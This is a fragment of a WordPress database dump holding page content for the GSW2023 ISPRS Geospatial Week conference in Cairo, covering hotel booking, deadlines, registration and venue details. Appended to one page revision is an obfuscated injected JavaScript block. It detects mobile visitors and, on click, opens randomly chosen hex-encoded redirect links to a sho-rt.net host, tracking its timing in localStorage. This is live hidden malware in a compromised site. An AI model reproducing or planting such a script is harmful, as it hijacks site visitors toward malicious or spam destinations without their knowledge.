bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:38:21','2023-05-18 02:38:21','',3066,'https://gsw2023.com/?p=4550',0,'revision','',0),
(4551,1,'2023-05-18 02:48:33','2023-05-18 02:48:33','','image001','','inherit','open','closed','','image001','','','2023-05-18 02:48:33','2023-05-18 02:48:33','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/image001.png',0,'attachment','image/png',0),
(4552,1,'2023-05-18 02:48:48','2023-05-18 02:48:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text 